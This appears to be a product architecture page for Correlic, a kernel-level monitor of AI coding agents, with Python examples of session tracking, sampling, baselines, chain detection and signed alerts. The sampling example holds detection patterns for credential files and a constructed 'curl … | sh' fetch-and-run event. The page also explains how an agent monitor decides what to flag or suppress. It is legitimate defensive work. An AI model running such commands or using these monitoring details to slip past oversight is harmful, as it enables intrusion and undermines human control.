Architecture Deep Dive

What Happens When Your
AI Agent Goes Rogue

See how Correlic monitors AI agent activity from the kernel up — capturing every process, file access, and network connection, then surfacing threats with autonomous AI investigation.

100% on-prem — no data ever leaves your infrastructure
The Journey

How AI Agent Activity Is Monitored

Scroll through each stage to see how Correlic captures, analyzes, and responds to everything your AI agents do.

Stage 1 of 11: Kernel Collection
Where It All Starts

Collection sources by platform:
  Linux: eBPF tracepoints, kprobes, ring buffers
  Windows: ETW providers, Security Audit, USN Journal
  macOS: kqueue, FSEvents, lsof polling

When an AI agent like Cursor, Claude Code, or Copilot performs any action on your system, Correlic captures it directly at the kernel level — before the agent even knows it's being watched.

Stage 2 of 11: Session & PID Tracking
Knowing Which Agent Did What

Example session sess-a1b2c3d4 (roles: AI Agent, Tool, Shell):
  cursor: AI Agent
  python3: Tool
  node: Tool
  curl: Shell
  git: Shell
  npm: Shell

Every AI agent process is assigned a unique session UUID that automatically inherits from parent to child — building a complete lineage tree so Correlic knows exactly which agent spawned which process.
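The inheritance rule described above, worked through as an added example (this is not Correlic's code): every exec event carries pid, ppid and executable name, an agent root opens a fresh session UUID, and each child copies its parent's session at exec time so the attribution survives the parent exiting. The agent binary names, the event shape and the replayed process sequence are constructed assumptions; the `is_agent_descended` lookup is the kind of attribution check a detection rule would consult before firing.

```python
"""Session UUID inheritance across an AI agent's process lineage.

Added example, not Correlic's code. Assumptions (hypothetical): every process
exec event carries pid, ppid and the executable name (comm); an agent root is
recognised by name; a child inherits its parent's session at exec time, so the
lineage survives even if the parent exits later.
"""
import uuid
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed list of agent executables; a real deployment would configure this.
AGENT_BINARIES = {"cursor", "claude", "copilot-agent"}


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    comm: str


@dataclass
class SessionTracker:
    session_of: Dict[int, str] = field(default_factory=dict)  # pid -> session UUID
    parent_of: Dict[int, int] = field(default_factory=dict)   # pid -> ppid
    comm_of: Dict[int, str] = field(default_factory=dict)     # pid -> executable name

    def on_exec(self, ev: ProcessEvent) -> Optional[str]:
        """Record the process and return its session, or None if it is not agent-descended."""
        self.parent_of[ev.pid] = ev.ppid
        self.comm_of[ev.pid] = ev.comm
        if ev.comm in AGENT_BINARIES:
            sid = str(uuid.uuid4())             # a new agent root opens a new session
        else:
            sid = self.session_of.get(ev.ppid)  # inherit from the parent, if it has one
        if sid is not None:
            self.session_of[ev.pid] = sid
        return sid

    def on_exit(self, pid: int) -> None:
        """Forget a process. Children hold their own copy of the session, so this is safe."""
        self.session_of.pop(pid, None)
        self.parent_of.pop(pid, None)
        self.comm_of.pop(pid, None)

    def is_agent_descended(self, pid: int) -> bool:
        """The attribution check a detection rule gates on before it fires."""
        return pid in self.session_of

    def lineage(self, pid: int) -> List[str]:
        """Executable names from the process up to its oldest known ancestor."""
        chain = []
        while pid in self.comm_of:
            chain.append(self.comm_of[pid])
            pid = self.parent_of[pid]
        return chain


def replay_demo() -> dict:
    """Replay a constructed exec sequence and report who belongs to which session."""
    t = SessionTracker()
    events = [  # constructed
        ProcessEvent(100, 1, "systemd"),    # not an agent
        ProcessEvent(200, 100, "cursor"),   # agent root -> new session
        ProcessEvent(201, 200, "bash"),
        ProcessEvent(202, 201, "python3"),
        ProcessEvent(203, 202, "curl"),     # great-grandchild of the agent
        ProcessEvent(300, 100, "sshd"),     # human login, unrelated
        ProcessEvent(301, 300, "bash"),
        ProcessEvent(400, 100, "claude"),   # second agent -> distinct session
    ]
    sessions = {ev.pid: t.on_exec(ev) for ev in events}
    lineage = t.lineage(203)  # curl -> python3 -> bash -> cursor -> systemd
    t.on_exit(201)            # bash exits; curl must stay attributed
    return {
        "sessions": sessions,
        "curl_lineage": lineage,
        "curl_still_attributed": t.is_agent_descended(203),
        "human_bash_attributed": t.is_agent_descended(301),
    }


if __name__ == "__main__":
    import pprint
    pprint.pprint(replay_demo())
```

Because the session is copied into each child at exec time, the mapping is keyed on pid rather than on a live parent link; that is what keeps `curl` attributed after its `bash` parent has gone away, and why the human `sshd` login never acquires a session.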

Stage 3 of 11: Intelligent Sampling
Keep What Matters, Drop What Doesn't

Security-first order:
  AI agent events: BYPASS
  Suspicious patterns: KEEP
  Benign system activity: DROP
  Remaining events: SAMPLE
~90% volume reduction · Zero AI blind spots

Not every event is worth storing. Correlic's security-first sampling pipeline ensures AI agent activity is never filtered, suspicious patterns are always kept, and routine noise is intelligently removed.
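The ordering matters: an agent-attributed event must be decided before any drop rule can see it, and suspicious matches must be decided before the benign filter. The following added example (not Correlic's code) implements that four-stage order on a constructed event shape; the suspicious patterns, the benign-noise rules and the deterministic hash-based sampling are assumptions made for illustration.

```python
"""Security-first sampling pipeline for host events.

Added example, not Correlic's code. Assumptions (hypothetical): each event is a
dict with comm, path, argv, ts and an optional session (set when the process is
agent-descended); the suspicious patterns and benign-noise rules below are
constructed for illustration.
"""
import hashlib
import re
from collections import Counter
from enum import Enum
from typing import Dict, List


class Decision(Enum):
    BYPASS = "bypass"            # AI agent event: never filtered
    KEEP = "keep"                # matches a suspicious pattern
    DROP = "drop"                # known benign system noise
    SAMPLE_KEEP = "sample-keep"  # survived sampling
    SAMPLE_DROP = "sample-drop"  # removed by sampling


# Constructed patterns; a real rule set would be far larger.
SUSPICIOUS = [
    re.compile(r"/\.ssh/"),
    re.compile(r"/etc/shadow$"),
    re.compile(r"\bchmod\s+777\b"),
    re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"),
]
BENIGN_COMMS = {"systemd-journald", "cron", "rsyslogd"}
BENIGN_PATH_PREFIXES = ("/proc/", "/sys/", "/var/log/")


def classify(ev: Dict, sample_rate: float = 0.1) -> Decision:
    """Apply the stages in security-first order; the first matching stage wins."""
    if ev.get("session"):
        return Decision.BYPASS
    text = f"{ev.get('path', '')} {ev.get('argv', '')}"
    if any(p.search(text) for p in SUSPICIOUS):
        return Decision.KEEP
    if ev.get("comm") in BENIGN_COMMS and str(ev.get("path", "")).startswith(BENIGN_PATH_PREFIXES):
        return Decision.DROP
    # Deterministic sampling: hash a stable key so the same event always receives
    # the same verdict, which keeps replays and audits reproducible.
    key = f"{ev.get('comm')}|{ev.get('path')}|{ev.get('argv')}|{ev.get('ts')}".encode()
    bucket = int.from_bytes(hashlib.blake2b(key, digest_size=8).digest(), "big") / 2**64
    return Decision.SAMPLE_KEEP if bucket < sample_rate else Decision.SAMPLE_DROP


def run_pipeline(events: List[Dict], sample_rate: float = 0.1) -> Dict[str, int]:
    """Return how many events landed in each decision bucket."""
    return dict(Counter(classify(ev, sample_rate).value for ev in events))


SAMPLE_EVENTS = [  # constructed
    {"comm": "python3", "path": "/home/dev/app/main.py", "session": "sess-a1b2c3d4", "ts": 1},
    {"comm": "curl", "argv": "curl http://203.0.113.42/x | sh", "session": "sess-a1b2c3d4", "ts": 2},
    {"comm": "bash", "path": "/home/dev/.ssh/id_rsa", "ts": 3},        # human, but suspicious
    {"comm": "cron", "path": "/var/log/cron.log", "ts": 4},             # benign noise
    {"comm": "systemd-journald", "path": "/proc/123/status", "ts": 5},  # benign noise
    {"comm": "vim", "path": "/home/dev/notes.txt", "ts": 6},            # routine: sampled
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev).value, ev.get("comm"), ev.get("path") or ev.get("argv"))
    print(run_pipeline(SAMPLE_EVENTS))
```

Note that the second constructed event would also match a suspicious pattern, but it is decided at the bypass stage because it is agent-attributed; the order guarantees an agent event can never reach the drop or sample stages.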

Stage 4 of 11: Correlation Engine
The Heart of Correlic

PostgreSQL: events & findings, baselines & incidents, AI context windows, alert delivery queue
Neo4j: agent process trees, parent-child edges, AI session propagation, attack chain traversal

Graph write strategy:
  Instant (process events): process tree edges are written to Neo4j immediately so detection always has an up-to-date graph.
  Batched (file, network, DNS): buffered and flushed periodically for efficiency without sacrificing graph completeness.

This is what Correlic is named for — correlation at the core. Every event is mapped by agent session and process ID, building a live relationship graph that connects everything an AI agent touches.

Stage 5 of 11: Threat Detection
Purpose-Built for AI Agent Threats

AI process gate (ACTIVE): only agent-descended processes trigger rules.

Live detection feed:
  python3 → /root/.ssh/id_rsa: Credential Access, CRITICAL
  curl → 203.0.113.42:443: Network Anomaly, HIGH
  agent → chmod 777 deploy.sh: Code Tampering, MEDIUM
Full MITRE ATT&CK coverage · Continuously expanding

Every detection rule gates on AI process attribution first — system daemons and human activity never trigger false positives. Rules are designed for the specific ways AI agents go rogue.

Stage 6 of 11: Behavioral Engine
Learning What's Normal

Baseline controls:
  Manual baseline: 24 hours, 7 days, 30 days, or permanent
  Auto-learning: strict safety rules · manual baseline recommended for faster accuracy
  Always protected: credentials, privileged files, attack infrastructure · never suppressed
Every decision trains the system · Noise decreases over time

Correlic continuously observes what your AI agents normally do and learns to suppress expected behavior — while ensuring that access to sensitive resources always generates a finding.
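The two rules that matter here are the expiry of a baseline and the protected-resource override that no baseline can defeat. The added example below (not Correlic's code) shows both, with an injectable clock so the expiry can be exercised without waiting; the baseline key shape, the protected path patterns, the constructed address list and the auto-learning threshold are assumptions for illustration.

```python
"""Baseline suppression with expiry and always-protected resources.

Added example, not Correlic's code. Assumptions (hypothetical): a baseline is
keyed by (agent, rule, target); the protected patterns and the address list are
constructed; the clock is injectable so expiry can be tested offline.
"""
import re
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

DURATIONS: Dict[str, Optional[int]] = {
    "24h": 24 * 3600,
    "7d": 7 * 24 * 3600,
    "30d": 30 * 24 * 3600,
    "permanent": None,
}

# Constructed: credentials, privileged files and known-bad infrastructure that
# must never be suppressed, whatever the baseline says.
PROTECTED_PATTERNS = [
    re.compile(r"/\.ssh/"),
    re.compile(r"/\.aws/credentials$"),
    re.compile(r"/etc/(shadow|sudoers)$"),
    re.compile(r"\.env$"),
]
PROTECTED_HOSTS = {"203.0.113.42"}  # constructed, taken from the page's example feed


def is_protected(target: str) -> bool:
    host = target.split(":")[0]
    return host in PROTECTED_HOSTS or any(p.search(target) for p in PROTECTED_PATTERNS)


@dataclass(frozen=True)
class BaselineKey:
    agent: str   # e.g. "cursor"
    rule: str    # e.g. "ai.unexpected_network"
    target: str  # file path or host:port


class BehavioralEngine:
    def __init__(self, clock: Callable[[], float] = time.time, auto_learn_after: int = 50):
        self._clock = clock
        self._expires: Dict[BaselineKey, Optional[float]] = {}  # None = permanent
        self._seen: Dict[BaselineKey, int] = {}
        self._auto_learn_after = auto_learn_after

    def allow(self, key: BaselineKey, duration: str = "7d") -> None:
        """A user 'Allow' decision. Protected resources are refused outright."""
        if is_protected(key.target):
            raise ValueError(f"{key.target} is always protected and cannot be baselined")
        ttl = DURATIONS[duration]
        self._expires[key] = None if ttl is None else self._clock() + ttl

    def observe(self, key: BaselineKey) -> bool:
        """Return True if the finding should be suppressed, False if it must surface.

        Repeated non-protected behaviour is auto-learned once it crosses the
        threshold (the crossing observation still surfaces); auto-learned
        baselines are short-lived (24h) so a mistake corrects itself.
        """
        if is_protected(key.target):
            return False
        if key in self._expires:
            exp = self._expires[key]
            if exp is None or exp > self._clock():
                return True
            del self._expires[key]  # expired: the behaviour surfaces again
        self._seen[key] = self._seen.get(key, 0) + 1
        if self._seen[key] >= self._auto_learn_after:
            self.allow(key, "24h")
        return False


if __name__ == "__main__":
    eng = BehavioralEngine()
    k = BaselineKey("cursor", "ai.file_access", "/home/dev/app/package.json")
    eng.allow(k, "7d")
    print(eng.observe(k))  # suppressed
    print(eng.observe(BaselineKey("cursor", "ai.credential_access", "/home/dev/.ssh/id_rsa")))  # surfaces
```

The protected check runs before the baseline lookup, so it holds even if a protected entry somehow reached the table; refusing the `allow` call as well means the user interface cannot create such an entry in the first place.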

Stage 7 of 11: Findings & Triage
Every Detection, Actionable

Example findings (each MITRE ATT&CK mapped, confidence 0.92):
  ai.credential_access: Critical
  ai.unexpected_network: High
  ai.code_tampering: Medium
Actions: Allow · Dismiss · Investigate

Each threat detection generates a structured finding with severity, confidence, context, and MITRE technique mapping. Users can allow, dismiss, or investigate each finding — and their decisions feed back into the behavioral engine.

Stage 8 of 11: Chain Correlation
Connecting the Dots

Chain: Full Compromise
  credential_access at T+0s
  unauthorized_exec at T+45s
  data_exfiltration at T+3m
CRITICAL · Severity amplified · Cooldown bypassed

A single finding is a data point. A chain of findings is evidence. Correlic links individual detections into multi-step attack sequences — because AI agents can perform complex attack patterns faster than any human.
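The linking step, as an added example that is not Correlic's code: findings are grouped by agent session, sorted, and matched against an ordered chain definition that must complete within a time window; a completed chain is reported at CRITICAL and flagged to bypass per-rule alert cooldowns. The chain definition follows the page's "Full Compromise" timeline; the finding shape, the ten-minute window and the constructed timestamps are assumptions.

```python
"""Linking individual findings into a multi-step attack chain.

Added example, not Correlic's code. Assumptions (hypothetical): findings carry
the agent session, rule name, timestamp and severity; a chain is an ordered
sequence of rules that must all occur in one session within a time window;
a matched chain is reported at CRITICAL and flagged to bypass per-rule alert
cooldowns. The chain definition mirrors the page's "Full Compromise" example.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Finding:
    session: str
    rule: str
    ts: float      # seconds
    severity: str


@dataclass
class Chain:
    name: str
    session: str
    steps: List[Tuple[str, float]]  # (rule, offset from the first step in seconds)
    severity: str = "CRITICAL"      # amplified regardless of the individual steps
    bypass_cooldown: bool = True    # must alert even if a rule fired recently


# Constructed chain definition, in the order the page's example shows.
CHAINS: Dict[str, List[str]] = {
    "Full Compromise": ["credential_access", "unauthorized_exec", "data_exfiltration"],
}


def match_chain(findings: List[Finding], pattern: List[str], window: float) -> Optional[List[Finding]]:
    """Find the earliest in-order occurrence of `pattern` within `window` seconds.

    `findings` must belong to one session and be sorted by time. Every start
    candidate is tried, so a stray early event cannot push the real chain out
    of the window.
    """
    for i, start in enumerate(findings):
        if start.rule != pattern[0]:
            continue
        matched = [start]
        for f in findings[i + 1:]:
            if f.ts - start.ts > window:
                break
            if f.rule == pattern[len(matched)]:
                matched.append(f)
                if len(matched) == len(pattern):
                    return matched
    return None


def detect_chains(findings: List[Finding], window: float = 600.0) -> List[Chain]:
    """Group findings by session and report every defined chain that completes."""
    by_session: Dict[str, List[Finding]] = {}
    for f in findings:
        by_session.setdefault(f.session, []).append(f)
    chains: List[Chain] = []
    for session, fs in by_session.items():
        fs.sort(key=lambda f: f.ts)
        for name, pattern in CHAINS.items():
            hit = match_chain(fs, pattern, window)
            if hit:
                t0 = hit[0].ts
                chains.append(Chain(name, session, [(f.rule, f.ts - t0) for f in hit]))
    return chains


# Constructed findings: the page's timeline (T+0s, T+45s, T+3m) plus an
# unrelated session whose steps occur in the wrong order.
SAMPLE_FINDINGS = [
    Finding("sess-a1b2c3d4", "credential_access", 1000.0, "CRITICAL"),
    Finding("sess-a1b2c3d4", "unauthorized_exec", 1045.0, "HIGH"),
    Finding("sess-a1b2c3d4", "data_exfiltration", 1180.0, "CRITICAL"),
    Finding("sess-ffff0000", "data_exfiltration", 2000.0, "CRITICAL"),
    Finding("sess-ffff0000", "credential_access", 2010.0, "CRITICAL"),
]

if __name__ == "__main__":
    for c in detect_chains(SAMPLE_FINDINGS):
        print(c)
```

Ordering is part of the signature: the second constructed session contains the same rule names but exfiltration precedes the credential read, so it is not reported. Tightening the window to 100 seconds also breaks the first session's chain, which is the trade-off between catching slow sequences and keeping unrelated findings apart.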

Stage 9 of 11: Incident Engine
From Findings to Action

INC-0041 · CRITICAL · OPEN
cursor session · 2 processes · chain detected
  14:32:01 CRITICAL credential_access: python3 → .ssh/id_rsa
  14:32:18 HIGH unauthorized_exec: curl spawned by agent
  14:32:44 CRITICAL data_exfiltration: curl → 203.0.113.42:443
Lifecycle states: open, investigating, resolved, dismissed

Findings are grouped by host and agent session into coherent incidents with full lifecycle management. Each incident gets a structured dossier — the foundation for AI-powered investigation.

Stage 10 of 11: AI Analysis
Evidence-Based, Never Assumed

Context window hierarchy: 1 minute, 1 hour, 1 day, 1 week, 1 month, 1 year
APT detection: threats invisible at 1-minute scale become obvious at weekly or monthly granularity. Broader windows catch slow, persistent attacks.
"What was this agent doing last Tuesday?"

Correlic builds detailed context windows at every time scale — from 1-minute snapshots to yearly summaries. Raw events are periodically cleaned without affecting analysis, because the context windows preserve full intelligence. This is what makes Correlic capable of detecting long-term threats that other tools miss.

Stage 11 of 11: Alerts & Response
The Right Alert, to the Right Place

Live alert feed:
  INC-0041 · credential_access · cursor session · just now · CRITICAL
  #security-alerts: Incident escalated to CRITICAL · 3 findings · Sent
  POST → siem.internal/webhook · HMAC-SHA256 signed · 200 OK
Severity levels: LOW, MEDIUM, HIGH, CRITICAL · external delivery gate: HIGH+

Every finding generates an in-app notification for a full audit trail. Incidents are delivered externally via Slack or webhook — severity-gated and cryptographically signed.
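Severity gating and signing, as an added example that is not Correlic's code: an incident below the gate is never sent, and one that passes is serialised canonically and signed with HMAC-SHA256 over the timestamp and body, so the receiving SIEM can verify origin in constant time and reject replays. The header names, the `sha256=<hex>` encoding, the `<timestamp>.<body>` signing input and the five-minute replay window are constructed conventions; Correlic's actual wire format is not described on the page.

```python
"""Severity-gated, HMAC-SHA256-signed webhook delivery and receiver-side verification.

Added example, not Correlic's code. Assumptions (hypothetical): the header
names, the "sha256=<hex>" encoding, signing over "<timestamp>.<body>" and the
five-minute replay window are constructed conventions; the transport call is
replaced by a function that returns the request so it can be inspected offline.
"""
import hashlib
import hmac
import json
import time
from typing import Dict, Optional, Tuple

SEVERITY_RANK = {"LOW": 0, "MEDIUM": 1, "HIGH": 2, "CRITICAL": 3}
REPLAY_WINDOW = 300  # seconds a signed request stays acceptable


def sign(secret: bytes, timestamp: int, body: bytes) -> str:
    """Bind the timestamp into the MAC so a captured request cannot be replayed later."""
    mac = hmac.new(secret, f"{timestamp}.".encode() + body, hashlib.sha256).hexdigest()
    return f"sha256={mac}"


def build_webhook(incident: Dict, secret: bytes, gate: str = "HIGH",
                  now: Optional[int] = None) -> Optional[Tuple[Dict[str, str], bytes]]:
    """Return (headers, body) for delivery, or None when the severity is below the gate."""
    if SEVERITY_RANK[incident["severity"]] < SEVERITY_RANK[gate]:
        return None
    ts = int(time.time()) if now is None else now
    # Canonical JSON: the receiver verifies the exact bytes, so serialisation must be stable.
    body = json.dumps(incident, sort_keys=True, separators=(",", ":")).encode()
    headers = {
        "Content-Type": "application/json",
        "X-Correlic-Timestamp": str(ts),            # assumed header names
        "X-Correlic-Signature": sign(secret, ts, body),
    }
    return headers, body


def verify_webhook(headers: Dict[str, str], body: bytes, secret: bytes,
                   now: Optional[int] = None) -> bool:
    """Receiver side: constant-time compare, then reject stale or future timestamps."""
    try:
        ts = int(headers["X-Correlic-Timestamp"])
        presented = headers["X-Correlic-Signature"]
    except (KeyError, ValueError):
        return False
    if not hmac.compare_digest(presented, sign(secret, ts, body)):
        return False
    current = int(time.time()) if now is None else now
    return abs(current - ts) <= REPLAY_WINDOW


# Constructed incident, matching the page's example feed.
INCIDENT = {
    "id": "INC-0041",
    "severity": "CRITICAL",
    "session": "sess-a1b2c3d4",
    "findings": ["credential_access", "unauthorized_exec", "data_exfiltration"],
}
SECRET = b"example-shared-secret"  # constructed; load from a secret store in practice

if __name__ == "__main__":
    headers, body = build_webhook(INCIDENT, SECRET)
    print(headers["X-Correlic-Signature"])
    print("verified:", verify_webhook(headers, body, SECRET))
```

The receiver checks the MAC before the timestamp so that a forged request never reaches the timestamp branch, and uses `hmac.compare_digest` rather than `==` to avoid leaking the signature through timing.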


End-to-end latency under 100ms from kernel event to stored finding